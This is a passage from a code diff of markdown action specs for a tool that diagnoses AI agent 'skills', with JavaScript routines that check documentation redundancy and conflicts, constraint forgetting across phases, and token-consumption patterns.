// 比较 category-mappings.json 与 specs/*.md 中的表格
const mappingsFile = `${skillPath}/specs/category-mappings.json`;
if (!fileExists(mappingsFile)) {
return []; // 无集中配置,跳过
}
const mappings = JSON.parse(Read(mappingsFile));
const conflicts = [];
// 与 dimension-mapping.md 对比
const dimMapping = Read(`${skillPath}/specs/dimension-mapping.md`);
for (const [category, config] of Object.entries(mappings.categories)) {
// 检查策略是否在文档中提及
for (const strategy of config.strategies || []) {
if (!dimMapping.includes(strategy)) {
conflicts.push({
type: 'mapping',
key: `${category}.strategies`,
issue: `策略 ${strategy} 在 JSON 中定义但未在文档中提及`
});
}
}
}
return conflicts;
}
```
## Execution
```javascript
async function executeDiagnosis(state, workDir) {
console.log('=== Diagnosing Documentation Structure ===');
const skillPath = state.target_skill.path;
const issues = [];
// 1. 检测冗余
const definitionDups = await detectDefinitionDuplicates(skillPath);
const hardcodedDups = await detectHardcodedDuplicates(skillPath);
for (const dup of [...definitionDups, ...hardcodedDups]) {
issues.push({
id: `DOC-RED-${issues.length + 1}`,
type: 'doc_redundancy',
severity: dup.severity,
location: { files: dup.files || [dup.file] },
description: dup.description || `${dup.type} 在多处定义`,
evidence: dup.files || [dup.file],
root_cause: '缺乏单一真相来源',
impact: '维护困难,易产生不一致',
suggested_fix: 'consolidate_to_ssot'
});
}
// 2. 检测冲突
const priorityConflicts = await detectPriorityConflicts(skillPath);
const driftConflicts = await detectImplementationDrift(skillPath);
for (const conflict of priorityConflicts) {
issues.push({
id: `DOC-CON-${issues.length + 1}`,
type: 'doc_conflict',
severity: 'critical',
location: { files: conflict.definitions.map(d => d.file) },
description: `${conflict.key} 在不同文件中定义不一致`,
evidence: conflict.definitions.map(d => `${d.file}: ${d.definition}`),
root_cause: '定义更新后未同步',
impact: '行为不可预测',
suggested_fix: 'reconcile_conflicting_definitions'
});
}
// 3. 生成报告
const severity = issues.some(i => i.severity === 'critical') ? 'critical' :
issues.some(i => i.severity === 'high') ? 'high' :
issues.length > 0 ? 'medium' : 'none';
const result = {
status: 'completed',
issues_found: issues.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: ['DOC-RED-001', 'DOC-RED-002', 'DOC-CON-001', 'DOC-CON-002'],
patterns_matched: issues.map(i => i.id.split('-').slice(0, 2).join('-')),
evidence: issues.flatMap(i => i.evidence),
recommendations: generateRecommendations(issues)
},
redundancies: issues.filter(i => i.type === 'doc_redundancy'),
conflicts: issues.filter(i => i.type === 'doc_conflict')
};
// 写入诊断结果
Write(`${workDir}/diagnosis/docs-diagnosis.json`, JSON.stringify(result, null, 2));
return {
stateUpdates: {
'diagnosis.docs': result,
issues: [...state.issues, ...issues]
},
outputFiles: [`${workDir}/diagnosis/docs-diagnosis.json`],
summary: `文档诊断完成:发现 ${issues.length} 个问题 (${severity})`
};
}
function generateRecommendations(issues) {
const recommendations = [];
if (issues.some(i => i.type === 'doc_redundancy')) {
recommendations.push('使用 consolidate_to_ssot 策略合并重复定义');
recommendations.push('考虑创建 specs/category-mappings.json 集中管理配置');
}
if (issues.some(i => i.type === 'doc_conflict')) {
recommendations.push('使用 reconcile_conflicting_definitions 策略解决冲突');
recommendations.push('建立文档同步检查机制');
}
return recommendations;
}
```
## Output
### State Updates
```javascript
{
stateUpdates: {
'diagnosis.docs': {
status: 'completed',
issues_found: N,
severity: 'critical|high|medium|low|none',
redundancies: [...],
conflicts: [...]
},
issues: [...existingIssues, ...newIssues]
}
}
```
### Output Files
- `${workDir}/diagnosis/docs-diagnosis.json` - 完整诊断结果
## Error Handling
| Error | Recovery |
|-------|----------|
| 文件读取失败 | 记录警告,继续处理其他文件 |
| 正则匹配超时 | 跳过该模式,记录 skipped |
| JSON 解析失败 | 跳过配置对比,仅进行模式检测 |
## Next Actions
- 如果发现 critical 问题 → 优先进入 action-propose-fixes
- 如果无问题 → 继续下一个诊断或 action-generate-report

View File

@@ -0,0 +1,269 @@
# Action: Diagnose Long-tail Forgetting
Analyze target skill for long-tail effect and constraint forgetting issues.
## Purpose
- Detect loss of early instructions in long execution chains
- Identify missing constraint propagation mechanisms
- Find weak goal alignment between phases
- Measure instruction retention across phases
## Preconditions
- [ ] state.status === 'running'
- [ ] state.target_skill.path is set
- [ ] 'memory' in state.focus_areas OR state.focus_areas is empty
## Detection Patterns
### Pattern 1: Missing Constraint References
```regex
# Phases that don't reference original requirements
# Look for absence of: requirements, constraints, original, initial, user_request
```
### Pattern 2: Goal Drift
```regex
# Later phases focus on immediate task without global context
/\[TASK\][^[]*(?!\[CONSTRAINTS\]|\[REQUIREMENTS\])/
```
### Pattern 3: No Checkpoint Mechanism
```regex
# Absence of state preservation at key points
# Look for lack of: checkpoint, snapshot, preserve, restore
```
### Pattern 4: Implicit State Passing
```regex
# State passed implicitly through conversation rather than explicitly
/(?<!state\.)context\./
```
## Execution
```javascript
async function execute(state, workDir) {
const skillPath = state.target_skill.path;
const startTime = Date.now();
const issues = [];
const evidence = [];
console.log(`Diagnosing long-tail forgetting in ${skillPath}...`);
// 1. Analyze phase chain for constraint propagation
const phaseFiles = Glob(`${skillPath}/phases/*.md`)
.filter(f => !f.includes('orchestrator') && !f.includes('state-schema'))
.sort();
// Extract phase order (for sequential) or action dependencies (for autonomous)
const isAutonomous = state.target_skill.execution_mode === 'autonomous';
// 2. Check each phase for constraint awareness
let firstPhaseConstraints = [];
for (let i = 0; i < phaseFiles.length; i++) {
const file = phaseFiles[i];
const content = Read(file);
const relativePath = file.replace(skillPath + '/', '');
const phaseNum = i + 1;
// Extract constraints from first phase
if (i === 0) {
const constraintMatch = content.match(/\[CONSTRAINTS?\]([^[]*)/i);
if (constraintMatch) {
firstPhaseConstraints = constraintMatch[1]
.split('\n')
.filter(l => l.trim().startsWith('-'))
.map(l => l.trim().replace(/^-\s*/, ''));
}
}
// Check if later phases reference original constraints
if (i > 0 && firstPhaseConstraints.length > 0) {
const mentionsConstraints = firstPhaseConstraints.some(c =>
content.toLowerCase().includes(c.toLowerCase().slice(0, 20))
);
if (!mentionsConstraints) {
issues.push({
id: `MEM-${issues.length + 1}`,
type: 'memory_loss',
severity: 'high',
location: { file: relativePath, phase: `Phase ${phaseNum}` },
description: `Phase ${phaseNum} does not reference original constraints`,
evidence: [`Original constraints: ${firstPhaseConstraints.slice(0, 3).join(', ')}`],
root_cause: 'Constraint information not propagated to later phases',
impact: 'May produce output violating original requirements',
suggested_fix: 'Add explicit constraint injection or reference to state.original_constraints'
});
evidence.push({
file: relativePath,
pattern: 'missing_constraint_reference',
context: `Phase ${phaseNum} of ${phaseFiles.length}`,
severity: 'high'
});
}
}
// Check for goal drift - task without constraints
const hasTask = /\[TASK\]/i.test(content);
const hasConstraints = /\[CONSTRAINTS?\]|\[REQUIREMENTS?\]|\[RULES?\]/i.test(content);
if (hasTask && !hasConstraints && i > 1) {
issues.push({
id: `MEM-${issues.length + 1}`,
type: 'memory_loss',
severity: 'medium',
location: { file: relativePath },
description: 'Phase has TASK but no CONSTRAINTS/RULES section',
evidence: ['Task defined without boundary constraints'],
root_cause: 'Agent may not adhere to global constraints',
impact: 'Potential goal drift from original intent',
suggested_fix: 'Add [CONSTRAINTS] section referencing global rules'
});
}
// Check for checkpoint mechanism
const hasCheckpoint = /checkpoint|snapshot|preserve|savepoint/i.test(content);
const isKeyPhase = i === Math.floor(phaseFiles.length / 2) || i === phaseFiles.length - 1;
if (isKeyPhase && !hasCheckpoint && phaseFiles.length > 3) {
issues.push({
id: `MEM-${issues.length + 1}`,
type: 'memory_loss',
severity: 'low',
location: { file: relativePath },
description: 'Key phase without checkpoint mechanism',
evidence: [`Phase ${phaseNum} is a key milestone but has no state preservation`],
root_cause: 'Cannot recover from failures or verify constraint adherence',
impact: 'No rollback capability if constraints violated',
suggested_fix: 'Add checkpoint before major state changes'
});
}
}
// 3. Check for explicit state schema with constraints field
const stateSchemaFile = Glob(`${skillPath}/phases/state-schema.md`)[0];
if (stateSchemaFile) {
const schemaContent = Read(stateSchemaFile);
const hasConstraintsField = /constraints|requirements|original_request/i.test(schemaContent);
if (!hasConstraintsField) {
issues.push({
id: `MEM-${issues.length + 1}`,
type: 'memory_loss',
severity: 'medium',
location: { file: 'phases/state-schema.md' },
description: 'State schema lacks constraints/requirements field',
evidence: ['No dedicated field for preserving original requirements'],
root_cause: 'State structure does not support constraint persistence',
impact: 'Constraints may be lost during state transitions',
suggested_fix: 'Add original_requirements field to state schema'
});
}
}
// 4. Check SKILL.md for constraint enforcement in execution flow
const skillMd = Read(`${skillPath}/SKILL.md`);
const hasConstraintVerification = /constraint.*verif|verif.*constraint|quality.*gate/i.test(skillMd);
if (!hasConstraintVerification && phaseFiles.length > 3) {
issues.push({
id: `MEM-${issues.length + 1}`,
type: 'memory_loss',
severity: 'medium',
location: { file: 'SKILL.md' },
description: 'No constraint verification step in execution flow',
evidence: ['Execution flow lacks quality gate or constraint check'],
root_cause: 'No mechanism to verify output matches original intent',
impact: 'Constraint violations may go undetected',
suggested_fix: 'Add verification phase comparing output to original requirements'
});
}
// 5. Calculate severity
const criticalCount = issues.filter(i => i.severity === 'critical').length;
const highCount = issues.filter(i => i.severity === 'high').length;
const severity = criticalCount > 0 ? 'critical' :
highCount > 2 ? 'high' :
highCount > 0 ? 'medium' :
issues.length > 0 ? 'low' : 'none';
// 6. Write diagnosis result
const diagnosisResult = {
status: 'completed',
issues_found: issues.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: [
'constraint_propagation',
'goal_drift',
'checkpoint_mechanism',
'state_schema_constraints'
],
patterns_matched: evidence.map(e => e.pattern),
evidence: evidence,
phase_analysis: {
total_phases: phaseFiles.length,
first_phase_constraints: firstPhaseConstraints.length,
phases_with_constraint_ref: phaseFiles.length - issues.filter(i =>
i.description.includes('does not reference')).length
},
recommendations: [
highCount > 0 ? 'Implement constraint injection at each phase' : null,
issues.some(i => i.description.includes('checkpoint'))
? 'Add checkpoint/restore mechanism' : null,
issues.some(i => i.description.includes('State schema'))
? 'Add original_requirements to state schema' : null
].filter(Boolean)
}
};
Write(`${workDir}/diagnosis/memory-diagnosis.json`,
JSON.stringify(diagnosisResult, null, 2));
return {
stateUpdates: {
'diagnosis.memory': diagnosisResult,
issues: [...state.issues, ...issues]
},
outputFiles: [`${workDir}/diagnosis/memory-diagnosis.json`],
summary: `Memory diagnosis: ${issues.length} issues found (severity: ${severity})`
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
'diagnosis.memory': {
status: 'completed',
issues_found: <count>,
severity: '<critical|high|medium|low|none>',
// ... full diagnosis result
},
issues: [...existingIssues, ...newIssues]
}
};
```
## Error Handling
| Error Type | Recovery |
|------------|----------|
| Phase file read error | Skip file, continue analysis |
| No phases found | Report as structure issue |
## Next Actions
- Success: action-diagnose-dataflow (or next in focus_areas)
- Skipped: If 'memory' not in focus_areas

View File

@@ -0,0 +1,200 @@
# Action: Diagnose Token Consumption
Analyze target skill for token consumption inefficiencies and output optimization opportunities.
## Purpose
Detect patterns that cause excessive token usage:
- Verbose prompts without compression
- Large state objects with unnecessary fields
- Full content passing instead of references
- Unbounded arrays without sliding windows
- Redundant file I/O (write-then-read patterns)
## Detection Patterns
| Pattern ID | Name | Detection Logic | Severity |
|------------|------|-----------------|----------|
| TKN-001 | Verbose Prompts | Prompt files > 4KB or high static/variable ratio | medium |
| TKN-002 | Excessive State Fields | State schema > 15 top-level keys | medium |
| TKN-003 | Full Content Passing | `Read()` result embedded directly in prompt | high |
| TKN-004 | Unbounded Arrays | `.push`/`concat` without `.slice(-N)` | high |
| TKN-005 | Redundant Write→Read | `Write(file)` followed by `Read(file)` | medium |
## Execution Steps
```javascript
async function diagnoseTokenConsumption(state, workDir) {
const issues = [];
const evidence = [];
const skillPath = state.target_skill.path;
// 1. Scan for verbose prompts (TKN-001)
const mdFiles = Glob(`${skillPath}/**/*.md`);
for (const file of mdFiles) {
const content = Read(file);
if (content.length > 4000) {
evidence.push({
file: file,
pattern: 'TKN-001',
severity: 'medium',
context: `File size: ${content.length} chars (threshold: 4000)`
});
}
}
// 2. Check state schema field count (TKN-002)
const stateSchema = Glob(`${skillPath}/**/state-schema.md`)[0];
if (stateSchema) {
const schemaContent = Read(stateSchema);
const fieldMatches = schemaContent.match(/^\s*\w+:/gm) || [];
if (fieldMatches.length > 15) {
evidence.push({
file: stateSchema,
pattern: 'TKN-002',
severity: 'medium',
context: `State has ${fieldMatches.length} fields (threshold: 15)`
});
}
}
// 3. Detect full content passing (TKN-003)
const fullContentPattern = /Read\([^)]+\)\s*[\+,]|`\$\{.*Read\(/g;
for (const file of mdFiles) {
const content = Read(file);
const matches = content.match(fullContentPattern);
if (matches) {
evidence.push({
file: file,
pattern: 'TKN-003',
severity: 'high',
context: `Full content passing detected: ${matches[0]}`
});
}
}
// 4. Detect unbounded arrays (TKN-004)
const unboundedPattern = /\.(push|concat)\([^)]+\)(?!.*\.slice)/g;
for (const file of mdFiles) {
const content = Read(file);
const matches = content.match(unboundedPattern);
if (matches) {
evidence.push({
file: file,
pattern: 'TKN-004',
severity: 'high',
context: `Unbounded array growth: ${matches[0]}`
});
}
}
// 5. Detect write-then-read patterns (TKN-005)
const writeReadPattern = /Write\([^)]+\)[\s\S]{0,100}Read\([^)]+\)/g;
for (const file of mdFiles) {
const content = Read(file);
const matches = content.match(writeReadPattern);
if (matches) {
evidence.push({
file: file,
pattern: 'TKN-005',
severity: 'medium',
context: `Write-then-read pattern detected`
});
}
}
// Calculate severity
const highCount = evidence.filter(e => e.severity === 'high').length;
const mediumCount = evidence.filter(e => e.severity === 'medium').length;
let severity = 'none';
if (highCount > 0) severity = 'high';
else if (mediumCount > 2) severity = 'medium';
else if (mediumCount > 0) severity = 'low';
return {
status: 'completed',
issues_found: evidence.length,
severity: severity,
execution_time_ms: Date.now() - startTime,
details: {
patterns_checked: ['TKN-001', 'TKN-002', 'TKN-003', 'TKN-004', 'TKN-005'],
patterns_matched: [...new Set(evidence.map(e => e.pattern))],
evidence: evidence,
recommendations: generateRecommendations(evidence)
}
};
}
function generateRecommendations(evidence) {
const recs = [];
const patterns = [...new Set(evidence.map(e => e.pattern))];
if (patterns.includes('TKN-001')) {
recs.push('Apply prompt_compression: Extract static instructions to templates, use placeholders');
}
if (patterns.includes('TKN-002')) {
recs.push('Apply state_field_reduction: Remove debug/cache fields, consolidate related fields');
}
if (patterns.includes('TKN-003')) {
recs.push('Apply lazy_loading: Pass file paths instead of content, let agents read if needed');
}
if (patterns.includes('TKN-004')) {
recs.push('Apply sliding_window: Add .slice(-N) to array operations to bound growth');
}
if (patterns.includes('TKN-005')) {
recs.push('Apply output_minimization: Use in-memory data passing, eliminate temporary files');
}
return recs;
}
```
## Output
Write diagnosis result to `${workDir}/diagnosis/token-consumption-diagnosis.json`:
```json
{
"status": "completed",
"issues_found": 3,
"severity": "medium",
"execution_time_ms": 1500,
"details": {
"patterns_checked": ["TKN-001", "TKN-002", "TKN-003", "TKN-004", "TKN-005"],
"patterns_matched": ["TKN-001", "TKN-003"],
"evidence": [
{
"file": "phases/orchestrator.md",
"pattern": "TKN-001",
"severity": "medium",
"context": "File size: 5200 chars (threshold: 4000)"
}
],
"recommendations": [
"Apply prompt_compression: Extract static instructions to templates"
]
}
}
```
## State Update
```javascript
updateState({
diagnosis: {
...state.diagnosis,
token_consumption: diagnosisResult
}
});
```
## Fix Strategies Mapping
| Pattern | Strategy | Implementation |
|---------|----------|----------------|
| TKN-001 | prompt_compression | Extract static text to variables, use template inheritance |
| TKN-002 | state_field_reduction | Audit and consolidate fields, remove non-essential data |
| TKN-003 | lazy_loading | Pass paths instead of content, agents load when needed |
| TKN-004 | sliding_window | Add `.slice(-N)` after push/concat operations |
| TKN-005 | output_minimization | Use return values instead of file relay |

Some files were not shown because too many files have changed in this diff Show More